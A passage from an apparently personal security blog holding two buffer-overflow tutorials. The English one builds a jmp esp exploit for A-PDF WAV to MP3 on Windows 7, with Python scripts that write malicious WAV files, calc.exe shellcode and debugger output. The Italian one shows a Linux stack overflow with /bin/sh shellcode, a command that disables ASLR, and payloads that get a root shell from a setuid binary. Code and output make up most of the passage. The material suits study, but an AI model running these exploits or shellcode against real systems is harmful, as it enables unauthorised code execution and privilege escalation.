"x4bx51x4fx47x54x45x51x4ax4bx45x36x4cx4bx44"
"x4cx50x4bx4cx4bx51x4fx45x4cx43x31x4ax4bx4c"
"x4bx45x4cx4cx4bx45x51x4ax4bx4cx49x51x4cx46"
"x44x44x44x48x43x51x4fx50x31x4ax56x45x30x50"
"x56x42x44x4cx4bx51x56x50x30x4cx4bx51x50x44"
"x4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx43x58x45"
"x58x4bx39x4ax58x4dx53x49x50x42x4ax50x50x43"
"x58x4ax50x4dx5ax44x44x51x4fx45x38x4ax38x4b"
"x4ex4cx4ax44x4ex50x57x4bx4fx4dx37x42x43x43"
"x51x42x4cx42x43x43x30x41x41");

buff = ("x41" * 4132);
nops = ("x90" * 12);
nseh = ("xEBx06x90x90");
retn = ("x5Cx26x47x00");
junk = ("x42" * 300);
sploit = (buff+ nseh + retn + nops + code + junk);

try:
    f1 = open("Dr_IDEs.wav","w");	#No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');

except:
    print ("[-] Error, could not write the file.");

As you could read, the exploit should launch calc.exe, but unfortunately we can only see an application crash on Win7.

But how can we exploit this vulnerability for Win7?

This “simple” question will allow us to understand how the Windows stack works.
Currently what we have to know is that when the CPU loads a program into memory three components are placed:
– Code segment
– Data segment
– Stack segment

Stack section loads and unloads frames, and to perform this function the CPU uses registers.

The most important ones are:
– ESP pointer on the stack
– EBP: pointer to the base of the stack
– EIP: pointer to next instruction
Now I would not go into details which have already been widely discussed on the Internet, refer to Google to fill some gaps in this article.

Stay tuned to our goal we say that there are many techniques of jumping to exploit a BOF. Watching this exploit is clear that it uses a technique called SEH, nevertheless in this tutorial we’ll see how to use a jmp esp.

Firstly we verify that there is actually BOF and the eip is overwritten:

#!/usr/bin/env python

# http://www.exploit-db.com/exploits/14681/

#################################################################################
#
# Title:	A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:	Dr_IDE
# Tested On:    XPSP3
# Date:		August 18, 2010
# Download: 	http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:	http://www.exploit-db.com/exploits/14676/
# Usage:	Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
# It Doesn't Work

buff = ("x41" * 5000);
sploit = (buff);

try:
    f1 = open("Dr_IDEs2.wav","w");	#No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');

except:
    print ("[-] Error, could not write the file.");

At this point we run the a-pdf application and link the process to OllyDbg.
By converting the newly created file with the exploit we notice that the application crashs and we verify precisely that the EIP is overwritten with all A ” x41″ in hexadecimal notation:

EAX 00000000
ECX 00001388
EDX 00001388
EBX 41414141
ESP 034DFE90 ASCII "AAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP 41414141
ESI 41414141
EDI 41414141
EIP 41414141

So the BOF happens, but in order to be used it is necessary to calculate the offset, the right range where the EIP is overwritten. To help us there are some tools in the framework Metasploit:

root@bt:/pentest/exploits/framework3/tools# ./pattern_create.rb 5000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1
Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3
Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3A [. . .]

We create the pattern and copy the output directly into the exploit:

#!/usr/bin/env python

# http://www.exploit-db.com/exploits/14681/

#################################################################################
#
# Title:	A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:	Dr_IDE
# Tested On:    XPSP3
# Date:		August 18, 2010
# Download: 	http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:	http://www.exploit-db.com/exploits/14676/
# Usage:	Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
# It Doesn't Work

buff = ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab
6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3A
d4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1A
f2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6A [ . . .]");
sploit = (buff);

try:
    f1 = open("Dr_IDEs3.wav","w");	#No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');

except:
    print ("[-] Error, could not write the file.");

Again we check the EIP address:

EAX 00000000
ECX 00001388
EDX 00001388
EBX 35684634
ESP 035DFE90 ASCII "h7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0
Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6F
m7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1F
p2Fp3Fp4F
EBP 31684630
ESI 68463368
EDI 46326846
EIP 46366846

Eip point to 46366846. So to calculate the offset we can use another tool of Metasploit. It takes as input the value just found and the number of bytes which created the BOF.

root@bt:/pentest/exploits/framework3/tools# ./pattern_offset.rb 46366846 5000
4128

Now we know exactly where to overwrite the EIP. We have a structure like this:
[ 4128 bytes BOF ] [ 4 bytes eip ] [ Other bytes where we can put the shellcode ]

We know that once the EIP is overwritten and the flow of execution is captured, there is another register that could be useful to point directly to the shellcode: ESP, or the top of the stack.

Let’s see exactly what happens:

#!/usr/bin/env python

# http://www.exploit-db.com/exploits/14681/

#################################################################################
#
# Title:	A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:	Dr_IDE
# Tested On:    XPSP3
# Date:		August 18, 2010
# Download: 	http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:	http://www.exploit-db.com/exploits/14676/
# Usage:	Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
# It Doesn't Work

buff = ("x41" * 4128);
eip = ("x42" * 4);
shellcode = ("x43" * 200);
sploit = (buff + eip + shellcode);

try:
    f1 = open("Dr_IDEs4.wav","w");	#No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');

except:
    print ("[-] Error, could not write the file.");

In this script we created a BOF with the character ” x41″, overwrote the EIP with ” x42″ and injected other code ” x43″. Analyzing the registers we note that the EIP has been properly overwritten and the ESP contains the character C or “ x43”. Bingo!

EAX 00000000
ECX 000010EC
EDX 000010EC
EBX 41414141
ESP 035CFE90 ASCII 43,"CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCC"
EBP 41414141
ESI 41414141
EDI 41414141
EIP 42424242

Checking the address to which ESP points, we can see that it was opportunely overwritten with “x43”.

035CFE90   43434343
035CFE94   43434343
035CFE98   43434343
035CFE9C   43434343
035CFEA0   43434343
035CFEA4   43434343
035CFEA8   43434343
035CFEAC   43434343
035CFEB0   43434343
035CFEB4   43434343
035CFEB8   43434343
035CFEBC   43434343
035CFEC0   43434343
035CFEC4   43434343
035CFEC8   43434343
035CFECC   43434343

Now we replace the characters “x43” with a working shellcode and overwrite the EIP with a jmp esp opcode. Thus when the program flow reaches the EIP, it will jump straight to our shellcode. In order to find a jmp esp opcode is necessary to look for the dll of OS and the program that loads at startup.

Hitting on “E” OllyDbg, you can see all DLLs loaded:

Executable modules
Base       Size       Entry      Name       File version      Path
00400000   001EC000   00401000   wavtomp3   1.0.0.0           C:Program FilesA-PDF Wav to MP3wavtomp3.exe
10000000   0008C000   10029CF0   lame_enc                     C:Program FilesA-PDF Wav to MP3lame_enc.dll
6B7F0000   0030B000   6B83E295   mf         12.0.7600.16385   C:WindowsSystem32mf.dll
6D270000   00072000   6D271576   dsound     6.1.7600.16385 (  C:Windowssystem32dsound.dll
6D800000   00059000   6D80DB19   MFPlat     12.0.7600.16385   C:WindowsSystem32MFPlat.DLL
6D860000   00198000   6D861291   NetworkE   6.1.7600.16385 (  C:Windowssystem32NetworkExplorer.dll
6DA00000   0005C000   6DA34A08   Structur   7.00.7600.16385   C:WindowsSystem32StructuredQuery.dll
6DFB0000   00016000   6DFB173D   thumbcac   6.1.7600.16385 (  C:Windowssystem32thumbcache.dll
707E0000   0009F000   707E18C6   SearchFo   6.1.7600.16385 (  C:Windowssystem32SearchFolder.dll
70990000   00014000   70991340   msacm32    6.1.7600.16385 (  C:Windowssystem32msacm32.dll
70B00000   00004000   70B01030   ksuser     6.1.7600.16385 (  C:WindowsSystem32ksuser.dll
70B40000   00032000   70B437C1   winmm      6.1.7600.16385 (  C:Windowssystem32winmm.dll
70F30000   0002B000   70F4D3FE   ieproxy    8.00.7600.16625   C:Program FilesInternet Explorerieproxy.dll
70FA0000   00058000   70FA15C0   tiptsf     6.1.7600.16385 (  C:Program FilesCommon Filesmicrosoft sharedinktiptsf.dll
713C0000   0002E000   713C1BBA   SHDOCVW    6.1.7600.16385 (  C:Windowssystem32SHDOCVW.dll
71480000   0004E000   714B7FAE   actxprxy   6.1.7600.16385 (  C:Windowssystem32actxprxy.dll
715B0000   0006F000   715B1E41   ntshrui    6.1.7600.16385 (  C:Windowssystem32ntshrui.dll
71620000   0000B000   71621200   CSCAPI     6.1.7600.16385 (  C:Windowssystem32CSCAPI.dll
71630000   00009000   716311D0   CSCDLL     6.1.7600.16385 (  C:WindowsSystem32CSCDLL.dll
71640000   0006A000   71641B06   cscui      6.1.7600.16385 (  C:WindowsSystem32cscui.dll
716B0000   00031000   716BA8B6   EhStorSh   6.1.7600.16385 (  C:Windowssystem32EhStorShell.dll
71880000   0016F000   7188D5F6   explorer   6.1.7600.16385 (  C:Windowssystem32explorerframe.dll
72340000   00A7E000   72347761   ieframe    8.00.7600.16385   C:Windowssystem32ieframe.DLL
73410000   0000A000   73414D20   slc        6.1.7600.16385 (  C:Windowssystem32slc.dll
73440000   00014000   73441DA9   ATL        3.05.2284         C:WindowsSystem32ATL.DLL
736C0000   00021000   736C145E   ntmarta    6.1.7600.16385 (  C:Windowssystem32ntmarta.dll
73710000   00007000   737110C0   AVRT       6.1.7600.16385 (  C:WindowsSystem32AVRT.dll
737A0000   00025000   737A2B71   POWRPROF   6.1.7600.16385 (  C:Windowssystem32POWRPROF.dll
737D0000   0003C000   737D3089   OLEACC     7.0.0.0 (win7_rt  C:Windowssystem32OLEACC.dll
73900000   0000F000   7390125E   samcli     6.1.7600.16385 (  C:Windowssystem32samcli.dll
73920000   00009000   739215A6   netutils   6.1.7600.16385 (  C:Windowssystem32netutils.dll
73970000   00007000   73971120   wsock32    6.1.7600.16385 (  C:Windowssystem32wsock32.dll
73A60000   000FB000   73A71AAE   WindowsC   6.1.7600.16385 (  C:Windowssystem32WindowsCodecs.dll
73B90000   00013000   73B91D3F   dwmapi     6.1.7600.16385 (  C:Windowssystem32dwmapi.dll
73BB0000   00039000   73BBE1E6   MMDevApi   6.1.7600.16385 (  C:WindowsSystem32MMDevApi.dll
73C40000   0002F000   73C4C7A2   DUser      6.1.7600.16385 (  C:Windowssystem32DUser.dll
73C70000   000B2000   73CC16FD   DUI70      6.1.7600.16385 (  C:Windowssystem32DUI70.dll
73EC0000   00040000   73ECA2DD   uxtheme    6.1.7600.16385 (  C:Windowssystem32uxtheme.dll
73F00000   000F5000   73F0ADAE   propsys    7.00.7600.16385   C:Windowssystem32propsys.dll
74000000   00012000   74004795   SAMLIB     6.1.7600.16385 (  C:Windowssystem32SAMLIB.dll
74040000   0019E000   74073731   comctl32   6.10 (win7_rtm.0  C:WindowsWinSxSx86_microsoft.windows.common-
controls_6595b64144ccf1df_6.0.7600.16385_none_421189da2b7fabfccomctl32.dll
745B0000   00009000   745B1220   version    6.1.7600.16385 (  C:Windowssystem32version.dll
748D0000   0003B000   748D128D   rsaenh     6.1.7600.16385 (  C:Windowssystem32rsaenh.dll
74B30000   00016000   74B32DC3   CRYPTSP    6.1.7600.16385 (  C:Windowssystem32CRYPTSP.dll
74F00000   00019000   74F01319   srvcli     6.1.7600.16385 (  C:Windowssystem32srvcli.dll
74F70000   00008000   74F710E9   Secur32    6.1.7600.16385 (  C:WindowsSystem32Secur32.dll
74F90000   0001A000   74F92CCD   SSPICLI    6.1.7600.16385 (  C:WindowsSystem32SSPICLI.DLL
74FB0000   0004B000   74FB2B6C   apphelp    6.1.7600.16385 (  C:Windowssystem32apphelp.dll
75000000   0000C000   750010E1   CRYPTBAS   6.1.7600.16385 (  C:Windowssystem32CRYPTBASE.dll
750A0000   0000E000   750A1235   RpcRtRem   6.1.7600.16385 (  C:Windowssystem32RpcRtRemote.dll
750B0000   0000B000   750B1992   profapi    6.1.7600.16385 (  C:Windowssystem32profapi.dll
75160000   00012000   75161441   DEVOBJ     6.1.7600.16385 (  C:Windowssystem32DEVOBJ.dll
752A0000   00027000   752A58B9   CFGMGR32   6.1.7600.16385 (  C:Windowssystem32CFGMGR32.dll
75360000   0004A000   75367A9D   KERNELBA   6.1.7600.16385 (  C:Windowssystem32KERNELBASE.dll
753B0000   0000A000   753B136C   LPK        6.1.7600.16385 (  C:Windowssystem32LPK.dll
753C0000   000D4000   754110E5   kernel32   6.1.7600.16385 (  C:Windowssystem32kernel32.dll
754A0000   00045000   754A11E1   WLDAP32    6.1.7600.16385 (  C:Windowssystem32WLDAP32.dll
754F0000   000CC000   754F168B   MSCTF      6.1.7600.16385 (  C:Windowssystem32MSCTF.dll
755C0000   0007B000   755C1AEE   comdlg32   6.1.7600.16385 (  C:Windowssystem32comdlg32.dll
75640000   0009D000   756747D7   USP10      1.0626.7600.1638  C:Windowssystem32USP10.dll
756E0000   0008F000   756E3FB1   oleaut32   6.1.7600.16385    C:Windowssystem32oleaut32.dll
75770000   00019000   75774975   sechost    6.1.7600.16385 (  C:WindowsSYSTEM32sechost.dll
757F0000   00035000   757F145D   WS2_32     6.1.7600.16385 (  C:Windowssystem32WS2_32.dll
75830000   00083000   758323D2   CLBCatQ    2001.12.8530.163  C:Windowssystem32CLBCatQ.DLL
759C0000   000AC000   759CA472   msvcrt     7.0.7600.16385 (  C:Windowssystem32msvcrt.dll
75AA0000   0019D000   75AA17E7   SETUPAPI   6.1.7600.16385 (  C:Windowssystem32SETUPAPI.dll
75C40000   001F9000   75C4224D   iertutil   8.00.7600.16385   C:Windowssystem32iertutil.dll
75E40000   00C49000   75EBD49A   shell32    6.1.7600.16385 (  C:Windowssystem32shell32.dll
76A90000   000A1000   76ACAFD4   RPCRT4     6.1.7600.16385 (  C:Windowssystem32RPCRT4.dll
76B40000   00057000   76B5A24A   SHLWAPI    6.1.7600.16385 (  C:Windowssystem32SHLWAPI.dll
76BA0000   000C9000   76BBF7C9   user32     6.1.7600.16385 (  C:Windowssystem32user32.dll
76C70000   0004E000   76C7EC49   GDI32      6.1.7600.16385 (  C:Windowssystem32GDI32.dll
76E00000   0015C000   76E55D13   ole32      6.1.7600.16385 (  C:Windowssystem32ole32.dll
76F60000   0013C000              ntdll      6.1.7600.16385 (  C:WindowsSYSTEM32ntdll.dll
770B0000   0001F000   770B1355   IMM32      6.1.7600.16385 (  C:Windowssystem32IMM32.DLL
770D0000   00005000   770D1438   PSAPI      6.1.7600.16385 (  C:Windowssystem32PSAPI.DLL
770E0000   00006000   770E1782   NSI        6.1.7600.16385 (  C:Windowssystem32NSI.dll
770F0000   000A0000   77112DD9   advapi32   6.1.7600.16385 (  C:Windowssystem32advapi32.dll

So we look for the opcode jmp esp in the dll:

76BA0000   000C9000   76BBF7C9   user32     6.1.7600.16385 (  C:Windowssystem32user32.dll

Double click on dll and then right click we go to “Search for -> All commands -> jmp esp”:

Found commands
Address    Disassembly                               Comment
76BA1000   CMP DWORD PTR DS:[EDI+243276F8],ECX       (Initial CPU selection)
76BC6D53   JMP ESP

So 76BC6D53 is the address with the instruction jmp esp inside user32.dll “x53x6dxbcx76” in little endian. However, to make the exploit more reliable as possible is good practice to use dll or exe which are loaded from the program, such as “wavtomp3.exe”.
Now we can add shellcode to launch calc.exe:

# http://www.exploit-db.com/exploits/14681/

#################################################################################
#
# Title:	A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:	Dr_IDE
# Tested On:    XPSP3
# Date:		August 18, 2010
# Download: 	http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:	http://www.exploit-db.com/exploits/14676/
# Usage:	Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
# It Doesn't Work

buff = ("x41" * 4128);
# 76bc6d53
eip = ("x53x6dxbcx76");
shellcode = ("x33xc9xb8x57xbaxf8x4bxdbxdaxb1x33xd9x74x24xf4"
"x5bx83xebxfcx31x43x0dx03x43x5ax58x0dxb7x8cx15"
"xeex48x4cx46x66xadx7dx54x1cxa5x2fx68x56xebxc3"
"x03x3ax18x50x61x93x2fxd1xccxc5x1exe2xe0xc9xcd"
"x20x62xb6x0fx74x44x87xdfx89x85xc0x02x61xd7x99"
"x49xd3xc8xaex0cxefxe9x60x1bx4fx92x05xdcx3bx28"
"x07x0dx93x27x4fxb5x98x60x70xc4x4dx73x4cx8fxfa"
"x40x26x0ex2ax99xc7x20x12x76xf6x8cx9fx86x3ex2a"
"x7fxfdx34x48x02x06x8fx32xd8x83x12x94xabx34xf7"
"x24x78xa2x7cx2ax35xa0xdbx2fxc8x65x50x4bx41x88"
"xb7xddx11xafx13x85xc2xcex02x63xa5xefx55xcbx1a"
"x4ax1dxfex4fxecx7cx95x8ex7cxfbxd0x90x7ex04x73"
"xf8x4fx8fx1cx7fx50x5ax59x81xa1x57x74x15x18x02"
"x35x78x9bxf8x7ax84x18x09x03x73x00x78x06x38x86"
"x90x7ax51x63x97x29x52xa6xf4xacxc0x2axd5x4bx60"
"xc8x29x9e");
sploit = (buff + eip + shellcode);

try:
    f1 = open("Dr_IDEs5.wav","w");	#No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');

except:
    print ("[-] Error, could not write the file.");

Perfect! We have finished. This is what you’re thinking … but actually the exploit still not work. Analysing with OllyDbg we note that only the 17th character of the shellcode is present in the EIP:

034CFE90  97 FE 4C 03 1B 00 DA 03   —þL.Ú
034CFE98  00 00 00 00 00 00 FF FF   ......ÿÿ
034CFEA0  83 EB FC 31 43 0D 03 43   ƒëü1C.C
034CFEA8  5A 58 0D B7 8C 15 EE 48   ZX.·ŒîH
034CFEB0  4C 46 66 AD 7D 54 1C A5   LFf­}T¥
034CFEB8  2F 68 56 EB C3 03 3A 18   /hVëÃ:

So nops ” x90″ are necessary now in order to switch the code of 16 bytes and to run the shellcode from the beginning:

#!/usr/bin/env python

# http://www.exploit-db.com/exploits/14681/

#################################################################################
#
# Title:	A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:	Dr_IDE
# Tested On:    XPSP3
# Date:		August 18, 2010
# Download: 	http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:	http://www.exploit-db.com/exploits/14676/
# Usage:	Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
# It Doesn't Work

buff = ("x41" * 4128);
# 76bc6d53
eip = ("x53x6dxbcx76");
nops = ("x90" * 16);
shellcode = ("x33xc9xb8x57xbaxf8x4bxdbxdaxb1x33xd9x74x24xf4"
"x5bx83xebxfcx31x43x0dx03x43x5ax58x0dxb7x8cx15"
"xeex48x4cx46x66xadx7dx54x1cxa5x2fx68x56xebxc3"
"x03x3ax18x50x61x93x2fxd1xccxc5x1exe2xe0xc9xcd"
"x20x62xb6x0fx74x44x87xdfx89x85xc0x02x61xd7x99"
"x49xd3xc8xaex0cxefxe9x60x1bx4fx92x05xdcx3bx28"
"x07x0dx93x27x4fxb5x98x60x70xc4x4dx73x4cx8fxfa"
"x40x26x0ex2ax99xc7x20x12x76xf6x8cx9fx86x3ex2a"
"x7fxfdx34x48x02x06x8fx32xd8x83x12x94xabx34xf7"
"x24x78xa2x7cx2ax35xa0xdbx2fxc8x65x50x4bx41x88"
"xb7xddx11xafx13x85xc2xcex02x63xa5xefx55xcbx1a"
"x4ax1dxfex4fxecx7cx95x8ex7cxfbxd0x90x7ex04x73"
"xf8x4fx8fx1cx7fx50x5ax59x81xa1x57x74x15x18x02"
"x35x78x9bxf8x7ax84x18x09x03x73x00x78x06x38x86"
"x90x7ax51x63x97x29x52xa6xf4xacxc0x2axd5x4bx60"
"xc8x29x9e");
sploit = (buff + eip + nops +  shellcode);

try:
    f1 = open("Dr_IDEs6.wav","w");	#No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');

except:
    print ("[-] Error, could not write the file.");

pwned !

Obviously instead of calc.exe we can put what we want as shown in the video:

The first tutorial finishes here.

See you.
Michele `m7x` Manzotti

References: Corelan.

Le basi del BOF Buffer overflow July 1, 2010

Posted by michelemanzotti in Linux, Security.
Tags: , , ,
add a comment

Rispolvero tra le bozze un vecchio post che avevo scritto secoli e secoli fa. Non so per quale diavolo di motivo non l’ho più pubblicato. Forse le migliaia di cose da fare hanno fatto si che me ne dimenticassi. Buona lettura…

Dopo l’articolo sulle basi dell’assembly e del debugging, vediamo in questo come implementare la tecnica del buffer overflow.

Senza perderci troppo sulla teoria che rimando a wikipedia, cerchiamo di sfruttare un codice vulnerabile per ottenere la shell di root.

Innanzitutto se utilizziamo un kernel superiore al 2.4 è necessario disattivare la randomizzazione dello stack:

# sysctl -w kernel.randomize_va_space=0
kernel.randomize_va_space = 0

Per riabilitarlo invece:

root@bt:~# sysctl -w kernel.randomize_va_space=3

vuln.c

int main(int argc, char **argv){
          char buf[8];
          strcpy(buf, argv[1]);
          printf("Hello %sn", buf);
}

Compiliamo:

# gcc -o vuln vuln.c -z execstack -fno-stack-protector -mpreferred-stack-boundary=2
vuln.c: In function ‘main’:
vuln.c:3: warning: incompatible implicit declaration of built-in function ‘strcpy’
vuln.c:4: warning: incompatible implicit declaration of built-in function ‘printf’

Ricordiamoci di utilizzare le opzioni -z execstack -fno-stack-protector -mpreferred-stack-boundary=2 per il kernel 2.6.x e settiamo il suid:

#chmod +s vuln

Procuriamoci uno shellcode da shellcode.org testiamo il suo funzionamento:

char main[] =
     "xebx19x5exb0x46x31xdbx31"
     "xc9xcdx80x31xc0xb0x0bx89"
     "xf3x31xffx57x56x89xe1x31"
     "xd2xcdx80xe8xe2xffxffxff"
     "/bin/sh";

Testiamo il suo corretto funzionamento:

root@bt:# gcc -o shellcode shellcode.c
root@bt:# ./shellcode
#

Bene ora possiamo esportare il tutto in una variabile d’ambiente aggiungendo anche del nop code.

user@bt$ export SH=`perl -e 'print "x90"x64,"xebx1dx5ex31xc0x88x46x07x89x76x08x89x46x0cx8dx4ex08x8dx56x0cx89xf3xb0x0bxcdx80x40x31xdbxcdx80xe8xdexffxffxff/bin/sh"'`

Ora non ci resta che individuare dove è localizzata la variabile d’ambiente appena creata.

get.c

int main(int argc, char *argv[])
{
          printf("The address of %s is %pn",argv[1], getenv(argv[1]));
          return 0;
}

Compiliamo e cerchiamo l’indirizzo della variabile d’ambiente:

user@$ ./get SH
The address of SH is 0xbffffed4

Ora possimao lanciare l’exploit sull’indirizzo appena trovato:

user@bt$ ./get SH
The address of SH is 0xbffffed4
user@bt:/root/Downloads/BOF_hakin9$ ./vuln `perl -e 'print "xd4xfexffxbf"x4'`
Hello ����������������
# whoami
root

Possiamo fare anche la stessa cosa senza utilizzare una variabile d’ambiente e shellcode, ma cercando il binario direttamente nella memoria.

find.c

#include 
#include 
#define BASE_ADDR    0xb7e7d000
int main(){
           char *ptr=BASE_ADDR;
           while(1){
                     if((strncmp(ptr,"/bin/sh",7))==0){
                                printf("%p : %sn",ptr,ptr);
                                return 0;
                     }
                     ptr++;
           }
}

Compiliamo con le stesse opzioni adottatte per vuln.c

Analizziamo lo stack address:

user@bt$ gdb -q vuln
(gdb) b main
Breakpoint 1 at 0x80483fa
(gdb) run
Starting program: /vuln

Breakpoint 1, 0x080483fa in main ()
Current language:  auto; currently asm
(gdb) x/x system
0xb7ea7a90 :    0x890cec83
(gdb) q
The program is running.  Exit anyway? (y or n) y

Nel caso in cui avessimo uno stack dinamico, l’indirizzo 0xb7ea7a90 cambierebbe ogni volta.

Cerchiamo la nostra shell in memoria:

user@bt$ ./find
0xb7faab33 : /bin/sh

Bene ora non ci resta che lanciare l’exploit:

user@bt$ ./vuln `printf "aaaabbbbccccx90x7axeaxb7aaaax33xabxfaxb7"`
Hello aaaabbbbcccc�z��aaaa3���
# whoami
root

Questo articolo ha il solo scopo didattico, infatti con l’utilizzo di kernel aggiornati potrebbero verificarsi errori e/o Segmentation Fault.